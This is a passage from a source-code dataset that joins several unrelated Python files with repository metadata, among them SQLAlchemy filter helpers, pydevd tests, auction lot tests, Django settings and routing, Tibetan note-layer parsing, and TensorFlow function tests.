] | null | null | null | sqlalchemy_filters/models.py | ConnectHolland/sqlalchemy-filters | fbc3269094dae9fc48fa3f080b4881477709e8da | [
"Apache-2.0"
] | null | null | null | from sqlalchemy.exc import InvalidRequestError
from sqlalchemy.inspection import inspect
from sqlalchemy.orm.mapper import Mapper
from sqlalchemy.util import symbol
import types
from .exceptions import BadQuery, FieldNotFound, BadSpec
class Field(object):
def __init__(self, model, field_name):
self.model = model
self.field_name = field_name
def get_sqlalchemy_field(self):
sqlalchemy_field = get_nested_column(self.model, self.field_name)
if sqlalchemy_field is None:
raise FieldNotFound(
'Model {} has no column `{}`.'.format(
self.model, self.field_name
)
)
# If it's a hybrid method, then we call it so that we can work with
# the result of the execution and not with the method object itself
if isinstance(sqlalchemy_field, types.MethodType):
sqlalchemy_field = sqlalchemy_field()
return sqlalchemy_field
def _is_hybrid_property(orm_descriptor):
return orm_descriptor.extension_type == symbol('HYBRID_PROPERTY')
def _is_hybrid_method(orm_descriptor):
return orm_descriptor.extension_type == symbol('HYBRID_METHOD')
def get_relationship_models(model, field):
parts = field.split(".")
if len(parts) > 1:
# Order in which joins are applied to the query matters so use list.
relationships = list()
# Find all relationships.
for i in range(1, len(parts)):
if (column := find_nested_relationship_model(inspect(model), parts[0:i])) is not None:
relationships.append(column.class_attribute)
return relationships
return list()
def find_nested_relationship_model(mapper, field):
parts = field if isinstance(field, list) else field.split(".")
if (part := parts[0]) in mapper.relationships:
related_field = mapper.relationships[part]
return find_nested_relationship_model(related_field.mapper, ".".join(parts[1::])) if len(parts) > 1 else related_field
else:
return None
def get_nested_column(model, field):
"""
Searches through relationships to find the requested field.
"""
parts = field if isinstance(field, list) else field.split(".")
mapper = inspect(model)
orm_descriptors = mapper.all_orm_descriptors
hybrid_fields = [
key for key, item in orm_descriptors.items()
if _is_hybrid_property(item) or _is_hybrid_method(item)
]
# Search in own model fields
if len(parts) == 1:
if field in mapper.columns or field in mapper.composites or field in hybrid_fields:
return getattr(model, field)
else:
return None
# Search in relationships.
if (part := parts[0]) in mapper.relationships:
return get_nested_column(getattr(model, part).property.entity.class_, ".".join(parts[1::]))
else:
return None
def get_query_models(query):
"""Get models from query.
:param query:
A :class:`sqlalchemy.orm.Query` instance.
:returns:
A dictionary with all the models included in the query.
"""
models = [col_desc['entity'] for col_desc in query.column_descriptions]
models.extend(mapper.class_ for mapper in query._join_entities)
# account also query.select_from entities
if (
hasattr(query, '_select_from_entity') and
(query._select_from_entity is not None)
):
model_class = (
query._select_from_entity.class_
if isinstance(query._select_from_entity, Mapper) # sqlalchemy>=1.1
else query._select_from_entity # sqlalchemy==1.0
)
if model_class not in models:
models.append(model_class)
return {model.__name__: model for model in models}
def get_model_from_spec(spec, query, default_model=None):
""" Determine the model to which a spec applies on a given query.
A spec that does not specify a model may be applied to a query that
contains a single model. Otherwise the spec must specify the model to
which it applies, and that model must be present in the query.
:param query:
A :class:`sqlalchemy.orm.Query` instance.
:param spec:
A dictionary that may or may not contain a model name to resolve
against the query.
:returns:
A model instance.
:raise BadSpec:
If the spec is ambiguous or refers to a model not in the query.
:raise BadQuery:
If the query contains no models.
"""
models = get_query_models(query)
if not models:
raise BadQuery('The query does not contain any models.')
model_name = spec.get('model')
if model_name is not None:
models = [v for (k, v) in models.items() if k == model_name]
if not models:
raise BadSpec(
'The query does not contain model `{}`.'.format(model_name)
)
model = models[0]
else:
if len(models) == 1:
model = list(models.values())[0]
elif default_model is not None:
return default_model
else:
raise BadSpec("Ambiguous spec. Please specify a model.")
return model
def get_default_model(query):
""" Return the singular model from `query`, or `None` if `query` contains
multiple models.
"""
query_models = get_query_models(query).values()
if len(query_models) == 1:
default_model, = iter(query_models)
else:
default_model = None
return default_model
def auto_join(query, *relationships, is_left_outer_join=False):
""" Automatically join models to `query` if they're not already present.
"""
for relationship in relationships:
model = relationship.property.entity.class_
if model not in get_query_models(query).values():
try:
query = query.join(relationship, isouter=is_left_outer_join)
except InvalidRequestError:
pass # can't be autojoined
return query
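# Editor-added sketch (not part of the original module): a hypothetical composition of the
# helpers above: join every relationship referenced by a dotted field name, then resolve
# the column itself via the Field wrapper.
def resolve_field_with_joins(query, model, field_name):
    relationships = get_relationship_models(model, field_name)
    query = auto_join(query, *relationships)
    sqlalchemy_field = Field(model, field_name).get_sqlalchemy_field()
    return query, sqlalchemy_field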
| 31.134021 | 126 | 0.654801 |
e4f53bc6043aab5ef105ada19f5047b056755ade | 1,805 | py | Python | python/helpers/pydev/pydev_tests_python/test_pydevd_io.py | alexey-anufriev/intellij-community | ffcd46f14e630acdefcc76e2bfc7c43d2449013a | [
"Apache-2.0"
] | 2 | 2019-04-28T07:48:50.000Z | 2020-12-11T14:18:08.000Z | python/helpers/pydev/pydev_tests_python/test_pydevd_io.py | alexey-anufriev/intellij-community | ffcd46f14e630acdefcc76e2bfc7c43d2449013a | [
"Apache-2.0"
] | 1 | 2020-07-30T19:04:47.000Z | 2020-07-30T19:04:47.000Z | python/helpers/pydev/pydev_tests_python/test_pydevd_io.py | bradleesand/intellij-community | 750ff9c10333c9c1278c00dbe8d88c877b1b9749 | [
"Apache-2.0"
] | 1 | 2020-10-15T05:56:42.000Z | 2020-10-15T05:56:42.000Z | from _pydevd_bundle.pydevd_io import IORedirector
from _pydevd_bundle.pydevd_comm import NetCommandFactory
import pytest
def test_io_redirector():
class MyRedirection1(object):
encoding = 'foo'
class MyRedirection2(object):
pass
my_redirector = IORedirector(MyRedirection1(), MyRedirection2(), wrap_buffer=True)
none_redirector = IORedirector(None, None, wrap_buffer=True)
assert my_redirector.encoding == 'foo'
with pytest.raises(AttributeError):
none_redirector.encoding
# Check that we don't fail creating the IORedirector if the original
# doesn't have a 'buffer'.
for redirector in (
my_redirector,
none_redirector,
):
redirector.write('test')
redirector.flush()
assert not redirector.isatty()
class _DummyWriter(object):
__slots__ = ['commands', 'command_meanings']
def __init__(self):
self.commands = []
self.command_meanings = []
def add_command(self, cmd):
from _pydevd_bundle.pydevd_comm import ID_TO_MEANING
meaning = ID_TO_MEANING[str(cmd.id)]
self.command_meanings.append(meaning)
self.commands.append(cmd)
class _DummyPyDb(object):
def __init__(self):
self.cmd_factory = NetCommandFactory()
self.writer = _DummyWriter()
def test_debug_console():
from _pydev_bundle.pydev_console_utils import DebugConsoleStdIn
class OriginalStdin(object):
def readline(self):
return 'read'
original_stdin = OriginalStdin()
py_db = _DummyPyDb()
debug_console_std_in = DebugConsoleStdIn(py_db, original_stdin)
assert debug_console_std_in.readline() == 'read'
assert py_db.writer.command_meanings == ['CMD_INPUT_REQUESTED', 'CMD_INPUT_REQUESTED']
| 25.422535 | 90 | 0.692521 |
3f0815ae203c73e2c6ae98751aeac2234ba74563 | 80 | py | Python | src/pyim/cis/callers/__init__.py | jrderuiter/pyim | e767c3bd14e0d0c9b3d0ff3482c19a8e1a9c61d4 | [
"MIT"
] | null | null | null | src/pyim/cis/callers/__init__.py | jrderuiter/pyim | e767c3bd14e0d0c9b3d0ff3482c19a8e1a9c61d4 | [
"MIT"
] | 1 | 2018-05-11T02:46:09.000Z | 2018-05-11T02:46:09.000Z | src/pyim/cis/callers/__init__.py | jrderuiter/pyim | e767c3bd14e0d0c9b3d0ff3482c19a8e1a9c61d4 | [
"MIT"
] | 1 | 2018-04-17T16:08:34.000Z | 2018-04-17T16:08:34.000Z | from .base import CisCaller, CisCallerCommand
from .cimpl import CimplCisCaller
| 26.666667 | 45 | 0.85 |
2a229e300b0e4e0c451789a6f0b05c492efab0e6 | 4,954 | py | Python | openprocurement/auctions/swiftsure/tests/lot.py | bdmbdsm/openprocurement.auctions.swiftsure | f5b93555eb12212c69c8168f861376eae85f4648 | [
"Apache-2.0"
] | null | null | null | openprocurement/auctions/swiftsure/tests/lot.py | bdmbdsm/openprocurement.auctions.swiftsure | f5b93555eb12212c69c8168f861376eae85f4648 | [
"Apache-2.0"
] | null | null | null | openprocurement/auctions/swiftsure/tests/lot.py | bdmbdsm/openprocurement.auctions.swiftsure | f5b93555eb12212c69c8168f861376eae85f4648 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
import unittest
from openprocurement.auctions.core.tests.base import snitch
from openprocurement.auctions.core.tests.lot import AuctionLotResourceTestMixin, AuctionLotProcessTestMixin
from openprocurement.auctions.core.tests.blanks.lot_blanks import (
# AuctionLotFeatureResourceTest
auction_value,
auction_features_invalid,
# AuctionLotBidderResourceTest
create_auction_bidder_invalid,
patch_auction_bidder,
# AuctionLotFeatureBidderResourceTest
create_auction_bidder_invalid_feature,
create_auction_bidder_feature
)
from openprocurement.auctions.swiftsure.tests.base import (
BaseWebTest, BaseAuctionWebTest, test_lots, test_auction_data,
)
from openprocurement.auctions.swiftsure.tests.blanks.lot_blanks import (
# AuctionLotResourceTest
patch_auction_currency
)
@unittest.skip("option not available")
class AuctionLotResourceTest(BaseAuctionWebTest, AuctionLotResourceTestMixin):
test_lots = test_lots
test_auction_data = test_auction_data
test_patch_auction_currency = snitch(patch_auction_currency)
@unittest.skip("option not available")
class AuctionLotFeatureResourceTest(BaseAuctionWebTest):
initial_lots = 2 * test_lots
test_auction_data = test_auction_data
test_auction_value = snitch(auction_value)
test_auction_features_invalid = snitch(auction_features_invalid)
@unittest.skip("option not available")
class AuctionLotBidderResourceTest(BaseAuctionWebTest):
initial_status = 'active.tendering'
initial_lots = test_lots
test_create_auction_bidder_invalid = snitch(create_auction_bidder_invalid)
test_patch_auction_bidder = snitch(patch_auction_bidder)
@unittest.skip("option not available")
class AuctionLotFeatureBidderResourceTest(BaseAuctionWebTest):
initial_lots = test_lots
def setUp(self):
super(AuctionLotFeatureBidderResourceTest, self).setUp()
self.lot_id = self.initial_lots[0]['id']
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {"data": {
"items": [
{
'relatedLot': self.lot_id,
'id': '1'
}
],
"features": [
{
"code": "code_item",
"featureOf": "item",
"relatedItem": "1",
"title": u"item feature",
"enum": [
{
"value": 0.01,
"title": u"good"
},
{
"value": 0.02,
"title": u"best"
}
]
},
{
"code": "code_lot",
"featureOf": "lot",
"relatedItem": self.lot_id,
"title": u"lot feature",
"enum": [
{
"value": 0.01,
"title": u"good"
},
{
"value": 0.02,
"title": u"best"
}
]
},
{
"code": "code_tenderer",
"featureOf": "tenderer",
"title": u"tenderer feature",
"enum": [
{
"value": 0.01,
"title": u"good"
},
{
"value": 0.02,
"title": u"best"
}
]
}
]
}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']['items'][0]['relatedLot'], self.lot_id)
self.set_status('active.tendering')
test_create_auction_bidder_invalid_feature = snitch(create_auction_bidder_invalid_feature)
test_create_auction_bidder_feature = snitch(create_auction_bidder_feature)
@unittest.skip("option not available")
class AuctionLotProcessTest(BaseAuctionWebTest, AuctionLotProcessTestMixin):
setUp = BaseWebTest.setUp
test_lots = test_lots
test_auction_data = test_auction_data
def suite():
tests = unittest.TestSuite()
tests.addTest(unittest.makeSuite(AuctionLotResourceTest))
tests.addTest(unittest.makeSuite(AuctionLotFeatureResourceTest))
tests.addTest(unittest.makeSuite(AuctionLotBidderResourceTest))
tests.addTest(unittest.makeSuite(AuctionLotFeatureBidderResourceTest))
tests.addTest(unittest.makeSuite(AuctionLotProcessTest))
return tests
if __name__ == '__main__':
unittest.main(defaultTest='suite')
| 33.931507 | 107 | 0.571256 |
e6c584e0befef0b7d8541b91b80019ed095d79bb | 157 | py | Python | articlevue/routers.py | wesleymutwiri/articlevue | 04dbe278bea8e96dbc95bb1c986dbce025c0957a | [
"MIT"
] | null | null | null | articlevue/routers.py | wesleymutwiri/articlevue | 04dbe278bea8e96dbc95bb1c986dbce025c0957a | [
"MIT"
] | null | null | null | articlevue/routers.py | wesleymutwiri/articlevue | 04dbe278bea8e96dbc95bb1c986dbce025c0957a | [
"MIT"
] | null | null | null | from rest_framework import routers
from articles.viewsets import ArticleViewSet
router = routers.DefaultRouter()
router.register(r'articles', ArticleViewSet) | 31.4 | 44 | 0.853503 |
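# Editor-added sketch (not part of the original file): the router above is normally wired
# into the project urls.py roughly as follows; the "api/" prefix is an assumption.
#
# from django.urls import include, path
#
# urlpatterns = [
#     path("api/", include(router.urls)),
# ]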
adf06274045e7a2d1567389e357a0a5d22561038 | 2,117 | py | Python | tests/settings.py | yunojuno/django-expiring-links | 1f8b98544327ce1e5ca4a9a2a3e0ca6e8dd33f48 | [
"MIT"
] | null | null | null | tests/settings.py | yunojuno/django-expiring-links | 1f8b98544327ce1e5ca4a9a2a3e0ca6e8dd33f48 | [
"MIT"
] | null | null | null | tests/settings.py | yunojuno/django-expiring-links | 1f8b98544327ce1e5ca4a9a2a3e0ca6e8dd33f48 | [
"MIT"
] | null | null | null | DEBUG = True
DATABASES = {
"default": {
"ENGINE": "django.db.backends.sqlite3",
"NAME": "test.db",
}
}
INSTALLED_APPS = (
"django.contrib.admin",
"django.contrib.auth",
"django.contrib.sessions",
"django.contrib.contenttypes",
"django.contrib.messages",
"django.contrib.staticfiles",
"request_token",
"tests",
)
MIDDLEWARE = [
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"request_token.middleware.RequestTokenMiddleware",
]
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [
# insert your TEMPLATE_DIRS here
],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.contrib.messages.context_processors.messages",
"request_token.context_processors.request_token",
]
},
}
]
ALLOWED_HOSTS = ["localhost", "127.0.0.1"]
SECRET_KEY = "request_token" # noqa: S703,S105
ROOT_URLCONF = "tests.urls"
APPEND_SLASH = True
STATIC_URL = "/static/"
STATIC_ROOT = "./static"
TIME_ZONE = "UTC"
SITE_ID = 1
LOGGING = {
"version": 1,
"disable_existing_loggers": False,
"formatters": {
"verbose": {
"format": "%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s"
},
"simple": {"format": "%(levelname)s %(message)s"},
},
"handlers": {
"console": {
"level": "DEBUG",
"class": "logging.StreamHandler",
"formatter": "simple",
}
},
"loggers": {"request_token": {"handlers": ["console"], "level": "DEBUG"}},
}
if not DEBUG:
raise Exception("This project is only intended to be used for testing.")
| 24.905882 | 95 | 0.600378 |
cc309b1675eb85de43c0e67d3340f6af89529131 | 4,720 | py | Python | pedurma/preview_note_layer.py | Esukhia/pedurma | 334b5957db30f514d396bd9defc9e9381f5b290b | [
"MIT"
] | null | null | null | pedurma/preview_note_layer.py | Esukhia/pedurma | 334b5957db30f514d396bd9defc9e9381f5b290b | [
"MIT"
] | null | null | null | pedurma/preview_note_layer.py | Esukhia/pedurma | 334b5957db30f514d396bd9defc9e9381f5b290b | [
"MIT"
] | 1 | 2021-11-04T07:04:05.000Z | 2021-11-04T07:04:05.000Z | import re
from pathlib import Path
from uuid import uuid4
from pedurma.utils import to_yaml
def get_note_layer(note_annotation):
note_layer = {
"id": uuid4().hex,
"annotation_type": "PedurmaNote",
"revision": "00001",
"annotations": note_annotation,
}
return note_layer
def get_pages(vol_text):
result = []
pg_text = ""
pages = re.split(r"([0-9]+\-[0-9]+)", vol_text)
for i, page in enumerate(pages[0:]):
if i % 2 == 0:
pg_text += page
else:
pg_text += page
result.append(pg_text)
pg_text = ""
return result
def get_last_syl_and_note_match(note_pattern, note):
if re.search(r"ལྟར་བཀོད།", note):
last_syl = ""
elif re.search(r"#", note_pattern):
syls = re.split(r"#", note_pattern)
last_syl = syls[1]
else:
last_syl = note_pattern
note_match = last_syl + note
return last_syl, note_match
def parse_note(note, walker, page_content, plus_present):
note_ann = {}
note_pattern = re.search(rf"(:\S+)?{note}", page_content)
if plus_present:
plus_note = re.sub(r"\+", r"\+", note)
if re.search(rf"\S+་([^#]\S+་?){plus_note}", page_content):
note_pattern = re.search(rf"\S+་([^#]\S+་?){plus_note}", page_content)
last_syl, note_match = get_last_syl_and_note_match(
note_pattern.group(1), plus_note
)
grp_1_loc = page_content.find(last_syl + note)
else:
note_pattern = re.search(rf"([^#]\S+་?){plus_note}", page_content)
if note_pattern:
grp_1_loc = note_pattern.start()
last_syl = ""
ann_start = grp_1_loc + walker + len(last_syl)
ann_end = ann_start
else:
if note_pattern.group(1):
ann_start = note_pattern.start() + walker
ann_end = ann_start + len(note_pattern.group(1))
else:
if re.search(rf"\S+་([^#]\S+་?){note}", page_content):
note_pattern = re.search(rf"\S+་([^#]\S+་?){note}", page_content)
last_syl, note_match = get_last_syl_and_note_match(
note_pattern.group(1), note
)
grp_1_loc = page_content.find(note_match)
else:
note_pattern = re.search(rf"([^#]\S+་?){note}", page_content)
if note_pattern:
grp_1_loc = note_pattern.start()
last_syl = note_pattern.group(1)
ann_start = grp_1_loc + walker
if note_pattern.group(1):
ann_end = ann_start + len(last_syl)
else:
ann_end = ann_start
note_ann = {
"span": {
"start": ann_start, # the variant unit or variant location is captured with the help of this span
"end": ann_end,
},
"collation_note": note,
}
page_content = re.sub(note, "", page_content, 1)
return note_ann, page_content
def parse_page(page, note_annotation, char_walker):
cur_note = {}
page = page.replace("\n", "#")
page_content = re.sub(r"(\([༠-༩]+\)\s)", "", page)
notes = re.findall(r"\<.*?\>", page_content)
for note in notes:
match = re.search(r"(\<.*?)(\+)(.*?\>)", note)
if match:
if match.group(2):
note_info, page_content = parse_note(
note, char_walker, page_content, True
)
else:
note_info, page_content = parse_note(note, char_walker, page_content, False)
cur_note[uuid4().hex] = note_info
note_annotation.update(cur_note)
cur_note = {}
new_page = base_extract(page)
return note_annotation, new_page
def base_extract(text):
text = re.sub(r"#", "\n", text)
return re.sub(r"(\([༠-༩]+\)\s)?<.*?>", "", text)
def build_note_layer(text):
char_walker = 0
note_annotation = {}
pages = get_pages(text)
for page in pages:
page = re.sub(r"([0-9]+\-[0-9]+)", "\n", page)
note_annotation, new_page = parse_page(page, note_annotation, char_walker)
char_walker += len(new_page) - 1
note_layer = get_note_layer(note_annotation)
return note_layer
def update_hybird_pecha_note_layer(preview_text, hybird_pecha_path, vol_num):
hybird_pecha_path = Path(hybird_pecha_path)
note_layer = build_note_layer(preview_text)
note_yml = to_yaml(note_layer)
note_yml_path = (
hybird_pecha_path
/ f"{hybird_pecha_path.stem}.opf"
/ "layers"
/ f"v{vol_num:03}"
/ "PedurmaNote.yml"
)
note_yml_path.write_text(note_yml, encoding="utf-8")
| 32.777778 | 105 | 0.56822 |
1660be13574adc9918303a3b841f86b8ffecc4d8 | 26,786 | py | Python | tensorflow/python/framework/function_test.py | RMORIOKA/tensorflow | 6886eb9c73940fd3b4dfadc3d6964ae9aa71eef6 | [
"Apache-2.0"
] | null | null | null | tensorflow/python/framework/function_test.py | RMORIOKA/tensorflow | 6886eb9c73940fd3b4dfadc3d6964ae9aa71eef6 | [
"Apache-2.0"
] | null | null | null | tensorflow/python/framework/function_test.py | RMORIOKA/tensorflow | 6886eb9c73940fd3b4dfadc3d6964ae9aa71eef6 | [
"Apache-2.0"
] | null | null | null | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
"""Tests for functions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
import numpy as np
import tensorflow as tf
from tensorflow.python.framework import function
from tensorflow.python.ops import functional_ops
from tensorflow.python.ops import gen_logging_ops
def _OptimizerOptions():
for cse in [False, True]:
for inline in [False, True]:
for cfold in [False, True]:
yield tf.ConfigProto(graph_options=tf.GraphOptions(
optimizer_options=tf.OptimizerOptions(
opt_level=tf.OptimizerOptions.L0,
do_common_subexpression_elimination=cse,
do_function_inlining=inline,
do_constant_folding=cfold)))
class FunctionTest(tf.test.TestCase):
def testDefineFunction2Args(self):
@function.Defun(tf.float32, tf.float32, func_name="APlus2B")
def APlus2B(a, b):
return a + b * 2
with tf.Graph().as_default():
call = APlus2B([1.0], [2.0])
self.assertEqual("APlus2B", call.op.name)
with tf.Session() as sess:
self.assertAllEqual([5.0], sess.run(call))
def testGradientFunc(self):
@function.Defun(tf.float32, func_name="XSquarePlusOneFn")
def XSquarePlusOne(x):
return x * x + 1.0
@function.Defun(tf.float32, tf.float32)
def XSquarePlusOneGrad(x, dy):
dx = functional_ops._symbolic_gradient(
input=[x, dy], Tout=[tf.float32], f="XSquarePlusOneFn", name="dx")
return dx
g = tf.Graph()
with g.as_default():
call_f = XSquarePlusOne([2.0])
call_g = XSquarePlusOneGrad([2.0], [0.1])
with tf.Session() as sess:
self.assertAllClose([5.0], sess.run(call_f))
self.assertAllClose([0.4], sess.run(call_g))
def testTanhSymGrad(self):
@function.Defun(tf.float32)
def Forward(x):
return tf.reduce_sum(tf.tanh(x))
g = tf.Graph()
with g.as_default():
x = tf.placeholder(tf.float32)
y = Forward(x)
dx = tf.gradients([y], [x])
inp = np.array([-1, 1, 2, -2], dtype=np.float32)
feed = {x: inp}
cfg = tf.ConfigProto(graph_options=tf.GraphOptions(
optimizer_options=tf.OptimizerOptions(
opt_level=tf.OptimizerOptions.L1, do_function_inlining=True)))
with tf.Session(graph=g, config=cfg) as sess:
out, = sess.run(dx, feed)
self.assertAllClose(1 - np.square(np.tanh(inp)), out)
def testCustomGradient(self):
dtype = tf.float32
@function.Defun(dtype, dtype, dtype)
def XentLossGrad(logits, labels, dloss):
dlogits = tf.reshape(dloss, [-1, 1]) * (tf.nn.softmax(logits) - labels)
dlabels = tf.zeros_like(labels)
# Takes exp(dlogits) to differentiate it from the "correct" gradient.
return tf.exp(dlogits), dlabels
@function.Defun(dtype, dtype, grad_func=XentLossGrad)
def XentLoss(logits, labels):
return tf.reduce_sum(labels * tf.log(tf.nn.softmax(logits)), 1)
g = tf.Graph()
with g.as_default():
logits = tf.placeholder(dtype)
labels = tf.placeholder(dtype)
loss = XentLoss(logits, labels)
dlogits = tf.gradients([loss], [logits])
x = np.random.uniform(-10., 10., size=(4, 9)).astype(np.float32)
prob = np.exp(x) / np.sum(np.exp(x), 1, keepdims=1)
y = np.random.uniform(-10., 10., size=(4, 9)).astype(np.float32)
for cfg in _OptimizerOptions():
tf.logging.info("cfg = %s", cfg)
with tf.Session(graph=g, config=cfg) as sess:
out, = sess.run(dlogits, {logits: x, labels: y})
self.assertAllClose(out, np.exp(prob - y))
def testCustomGradientError(self):
dtype = tf.float32
@function.Defun(dtype, dtype, dtype)
def Grad(x, dy, dz):
# Should have returned 1 result.
return x, dy + dz
@function.Defun(dtype, grad_func=Grad)
def Forward(x):
return x, x
g = tf.Graph()
with g.as_default():
inp = tf.placeholder(dtype)
out = tf.add_n(Forward(inp))
dinp = tf.gradients(out, [inp])
x = np.random.uniform(-10., 10., size=(4, 9)).astype(np.float32)
with tf.Session(graph=g) as sess:
with self.assertRaisesRegexp(
tf.errors.InvalidArgumentError,
"SymGrad expects to return 1.*but get 2.*instead"):
_ = sess.run(dinp, {inp: x})
def testSymGradShape(self):
g = tf.Graph()
with g.as_default():
x = tf.placeholder(tf.float32, [25, 4])
y = tf.placeholder(tf.float32, [200, 100])
dz = tf.placeholder(tf.float32, [1])
# We assume Foo is a function of (x, y) -> (z). Then, Foo's
# gradient function is (x, y, dz) -> (dx, dy). dx's shape
# should be the same as x's; and dy's shape should be the same
# as y's.
dx, dy = functional_ops._symbolic_gradient(
input=[x, y, dz], Tout=[tf.float32] * 2, f="Foo")
self.assertEqual(x.get_shape(), dx.get_shape())
self.assertEqual(y.get_shape(), dy.get_shape())
def testSymGradAttr(self):
@function.Defun(noinline=True)
def Foo(x):
return x * 2
self.assertTrue(
Foo.instantiate([tf.float32]).definition.attr["_noinline"].b)
g = tf.Graph()
with g.as_default():
x = tf.constant(3.0)
y = Foo(x)
dx, = tf.gradients(y, [x])
cfg = tf.ConfigProto(graph_options=tf.GraphOptions(
optimizer_options=tf.OptimizerOptions(
opt_level=tf.OptimizerOptions.L0,
do_common_subexpression_elimination=True,
do_function_inlining=True,
do_constant_folding=True)))
with self.test_session(graph=g, config=cfg):
self.assertAllClose(y.eval(), 6.)
self.assertAllClose(dx.eval(), 2.)
def testZNoDepOnY(self):
@function.Defun(tf.float32, tf.float32)
def Foo(x, y): # pylint: disable=unused-argument
return x * 2
with tf.Graph().as_default():
# z = Foo(x, y). z does not depend on y.
x = tf.constant(1.0)
y = tf.constant(2.0)
z = Foo(x, y)
dx, dy = tf.gradients([z], [x, y])
with tf.Session() as sess:
dx_val, dy_val = sess.run([dx, dy])
self.assertEqual([2.0], dx_val)
self.assertEqual([0.0], dy_val)
def testDefineFunctionNoArgs(self):
@function.Defun(func_name="AConstant")
def AConstant():
return tf.constant([42])
with tf.Graph().as_default():
call = AConstant()
self.assertEqual("AConstant", call.op.name)
with tf.Session() as sess:
self.assertAllEqual([42], sess.run(call))
def testDefineFunctionNames(self):
@function.Defun(tf.float32, func_name="Foo")
def Foo(a):
return a + 1
with tf.Graph().as_default():
call1 = Foo([1.0])
self.assertEqual("Foo", call1.op.name)
call2 = Foo([1.0])
self.assertEqual("Foo_1", call2.op.name)
# pylint: disable=unexpected-keyword-arg
call3 = Foo([1.0], name="mine")
self.assertEqual("mine", call3.op.name)
with tf.name_scope("my"):
call4 = Foo([1.0], name="precious")
self.assertEqual("my/precious", call4.op.name)
def testNoOp(self):
@function.Defun(tf.float32)
def Foo(x):
y = tf.Print(x, [x], "Hello")
with tf.control_dependencies([y]):
z = tf.no_op()
with tf.control_dependencies([z]):
return x * 2
with tf.Graph().as_default(), self.test_session():
z = Foo(tf.constant(3.0))
self.assertAllEqual(z.eval(), 6.0)
def testAssertOp(self):
@function.Defun(tf.float32)
def Foo(x):
check = gen_logging_ops._assert(tf.greater(x, 0), [x])
with tf.control_dependencies([check]):
return x * 2
g = tf.Graph()
with g.as_default(), self.test_session():
self.assertAllEqual(Foo(tf.constant(3.0)).eval(), 6.0)
with self.assertRaisesRegexp(tf.errors.InvalidArgumentError,
"assertion failed.*-3"):
self.assertAllEqual(Foo(tf.constant(-3.0)).eval(), 6.0)
def testAssertWrapper(self):
@function.Defun(tf.float32)
def MyFn(x):
with tf.control_dependencies([tf.Assert(tf.less_equal(x, 10.0), [x])]):
return tf.identity(x)
with self.test_session():
self.assertEqual(1.0, MyFn(1.0).eval())
with self.assertRaisesRegexp(tf.errors.InvalidArgumentError, "assertion"):
_ = MyFn(100.0).eval()
def testVar(self):
@function.Defun(tf.float32)
def Foo(x):
return x * x + 1
g = tf.Graph()
with g.as_default():
v = tf.Variable(tf.constant(10.0))
z = Foo(v)
with self.test_session(graph=g):
tf.global_variables_initializer().run()
self.assertAllEqual(z.eval(), 101.)
def testDefineErrors(self):
with tf.Graph().as_default():
with self.assertRaisesRegexp(ValueError, "can not return None"):
@function.Defun()
def NoResult():
pass
_ = NoResult.definition
with self.assertRaisesRegexp(ValueError, "can not return None"):
@function.Defun()
def TwoNone():
return None, None
_ = TwoNone.definition
with self.assertRaisesRegexp(ValueError, "are not supported"):
@function.Defun()
def DefaultArg(unused_a=12):
return tf.constant([1])
_ = DefaultArg.definition
with self.assertRaisesRegexp(ValueError, "are not supported"):
@function.Defun()
def KwArgs(**unused_kwargs):
return tf.constant([1])
_ = KwArgs.definition
with self.assertRaisesRegexp(ValueError, "specified input types"):
@function.Defun(tf.float32)
def PlusMinusV2(a, b):
return a + b, b - a
_ = PlusMinusV2.definition
with self.assertRaisesRegexp(ValueError, "specified input types"):
@function.Defun(tf.float32, tf.float32, tf.float32)
def PlusMinusV3(a, b):
return a + b, b - a
_ = PlusMinusV3.definition
def testCallErrors(self):
@function.Defun()
def Const():
return tf.constant(1)
@function.Defun(tf.int32)
def PlusOne(a):
return a + 1
@function.Defun(tf.int32, tf.int32)
def PlusMinus(a, b):
return a + b, b - a
with tf.Graph().as_default():
_ = Const()
# pylint: disable=too-many-function-args
# pylint: disable=unexpected-keyword-arg
# pylint: disable=no-value-for-parameter
with self.assertRaisesRegexp(ValueError, "arguments: 0"):
_ = Const(1)
with self.assertRaisesRegexp(ValueError, "arguments: 0"):
_ = Const(1, 2)
with self.assertRaisesRegexp(ValueError, "arguments: 1"):
_ = PlusOne()
_ = PlusOne(1)
with self.assertRaisesRegexp(ValueError, "arguments: 1"):
_ = PlusOne(1, 2)
with self.assertRaisesRegexp(ValueError, "arguments: 2"):
_ = PlusMinus()
with self.assertRaisesRegexp(ValueError, "arguments: 2"):
_ = PlusMinus(1)
_ = PlusMinus(1, 2)
_ = PlusOne(1, name="p1")
with self.assertRaisesRegexp(ValueError, "Unknown keyword arguments"):
_ = PlusOne(1, device="/gpu:0")
def testFunctionDecorator(self):
@function.Defun(tf.float32, func_name="Minus1")
def Minus1(b):
return b - 1.0
with tf.Graph().as_default():
call1 = Minus1([2.])
self.assertTrue(isinstance(Minus1, function._DefinedFunction))
self.assertEqual(Minus1.name, "Minus1")
# pylint: disable=unexpected-keyword-arg
call2 = Minus1(call1, name="next")
# pylint: enable=unexpected-keyword-arg
self.assertEqual("next", call2.op.name)
with tf.Session() as sess:
self.assertAllEqual([1], sess.run(call1))
self.assertAllEqual([0], sess.run(call2))
def testNestedFunction(self):
@function.Defun(tf.float32)
def Cube(x):
return x * x * x
@function.Defun(tf.float32, tf.float32)
def CubeXPlusY(x, y):
return Cube(x) + y
